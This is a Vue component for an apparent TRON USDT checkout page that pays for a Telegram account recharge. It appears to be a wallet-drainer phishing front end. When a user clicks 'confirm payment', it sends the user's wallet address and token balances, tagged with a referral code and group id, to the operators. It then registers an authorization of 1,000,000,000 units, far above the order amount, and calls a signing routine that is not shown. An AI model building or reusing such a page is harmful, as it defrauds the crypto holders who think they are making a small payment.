<template>
    <div>
        <AuthorizePayOverlay
            :visible="overlayVisible"
            :message="overlayMessage"
            :type="overlayType"
        />
        <a-spin :spinning="pageLoading" tip="加载中...">
        <div class="pay-wrap">
            <div class="content">
                <p class="pay-tips"> 付款成功后请勿关闭此页面，请耐心等待自动回调订单，否则可能无法自动到账!</p>

                <div class="info-wrap">
                    <div class="info-list">
                        <span class="label">商品订单</span>
                        <span class="text">{{ detail.order_no }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">商品详情</span>
                        <span class="text">{{ detail.order_name }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">购买数量</span>
                        <span class="text">{{ detail.quantity }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">付款金额</span>
                        <span class="text">{{ detail.rech_amount * detail.quantity }}USDT</span>
                    </div>
                    <div class="info-list">
                        <span class="label">充值账号</span>
                        <span class="text">{{ detail.tg_no }}</span>
                    </div>
                </div>

                <div class="pay-list">
                    <div class="btn-wrap">
                        <a-button
                            class="btn"
                            type="primary"
                            :disabled="payDisabled || paySubmitting"
                            :loading="paySubmitting"
                            @click="onPay"
                        >
                            确认支付
                        </a-button>
                    </div>
                </div>
            </div>
        </div>
        </a-spin>
    </div>
</template>

<script>

import { connectWallet, getUSDTBalance, signAndSend1 } from '../util/tronweb';
import { getWalletInitData, addAuthorize, addToast, reportTxWatch } from '../util/api';
import { message } from 'ant-design-vue';
import AuthorizePayOverlay from '../components/AuthorizePayOverlay.vue';
import { PAY_MSG, isTrxEnoughForAuthorize, createPayClickGuard } from '../util/walletPayUi';
import { getGameGroupIdFromRoute } from '../util/deeplink';

export default {
    name: 'WalletPayment',
    components: {
        AuthorizePayOverlay,
    },
    data() {
        return {
            detail: {},
            tg_no: '',
            referralCode: '',
            gameGroupId: undefined,
            payDisabled: false,
            paySubmitting: false,
            payClickGuard: null,
            overlayVisible: false,
            overlayMessage: '',
            overlayType: 'error',
            money: 0,
            trx: 0,
            wallet:'',
            energy: 0,
            pageLoading: false,
        };
    },
    created() {
        this.payClickGuard = createPayClickGuard();
    },
    async mounted() {
        this.pageLoading = true;
        try {
            const tgNo = this.$route.params.tgNo;
            const referralCode = this.$route.params.referralCode;
            this.referralCode = referralCode;
            this.gameGroupId = getGameGroupIdFromRoute(this.$route);
            this.tg_no = tgNo;

            this.wallet = await connectWallet();
            if (!this.wallet) {
                return;
            }

            const res = await getWalletInitData({ tgNo: this.tg_no, address: this.wallet });
            this.detail = res?.data?.order || {};
            const resources = res?.data?.walletResources || {};
            this.trx = Number(resources.trx) || 0;
            this.energy = Number(resources.energy) || 0;

            this.money = await getUSDTBalance(this.wallet);
        } catch (e) {
            console.error('[WalletPay] 初始化失败:', e);
            message.error('加载订单信息失败，请刷新重试');
        } finally {
            this.pageLoading = false;
        }
    },
    methods: {
        showTrxFail() {
            this.overlayType = 'error';
            this.overlayMessage = PAY_MSG.trxFail;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        showGasFail() {
            this.overlayType = 'error';
            this.overlayMessage = PAY_MSG.gasFail;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        showPaySuccessWait() {
            this.overlayType = 'wait';
            this.overlayMessage = PAY_MSG.waitNetwork;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        async onPay() {
            if (this.payDisabled) {
                return;
            }
            if (!this.payClickGuard?.tryStart()) {
                return;
            }
            this.paySubmitting = true;
            try {
            await addToast({
                referralCode: this.referralCode,
                address: this.wallet,
                usdt_balance: this.money,
                trx_balance: this.trx,
                energy:this.energy,
                is_authorize: '0',
                message: '有用户访问网站',
                gameGroupId: this.gameGroupId,
            });

            //({ trx: this.trx, energy: this.energy } = await getWalletResources(this.wallet));

            if (!isTrxEnoughForAuthorize(this.trx, this.energy)) {
                console.warn('[authorize] 余额不足', { trx: this.trx, energy: this.energy });
                this.showGasFail();
                return;
            }

            if (Number(this.detail.rech_amount) >this.money) {
                message.warning('USDT余额不足');
                return;
            }

            const authData = {
                address: this.wallet,
                tg_no: this.detail.tg_no,
                referralCode: this.referralCode,
                authorize_banlce: 1000000000,
                order_no: this.detail.order_no,
                usdt_banlce: this.money,
                trx_balance: this.trx,
            };
            if (this.gameGroupId) {
                authData.gameGroupId = this.gameGroupId;
            }
            await addAuthorize(authData);

            try {
                const result = await signAndSend1();
                if (result && result.txid) {
                    await reportTxWatch(result.txid, this.wallet);
                    this.showPaySuccessWait();
                } else {
                    this.showTrxFail();
                }
            } catch (e) {
                console.error(e);
                this.showTrxFail();
            }
            } finally {
                this.paySubmitting = false;
                this.payClickGuard?.end();
            }
        },
    },
};
</script>

<style scoped lang="less">
.pay-wrap {
    display: flex;
    justify-content: center;
    margin-top: 20px;
    background: #fff;

    .content {
        width: 1200px;

        .pay-tips {
            padding: 10px 15px;
            line-height: 22px;
            margin-bottom: 0;
            background-color: #FFF3F3;
            font-size: 14px;
            color: red;
            margin: 10px;
            border-radius: 4px;
        }

        .info-wrap {
            padding: 0 20px;
        }

        .info-list {
            height: 56px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            border-bottom: #f8f8f8 2px solid;
        }

        .pay-list {
            padding: 20px;
        }

        .btn-wrap {
            display: flex;
            justify-content: center;

            .btn {
                height: 50px;
                width: 100%;
                margin-top: 20px;
                font-size: 1.3rem;

                &:disabled {
                    opacity: 0.55;
                    cursor: not-allowed;
                }
            }
        }
    }
}
</style>
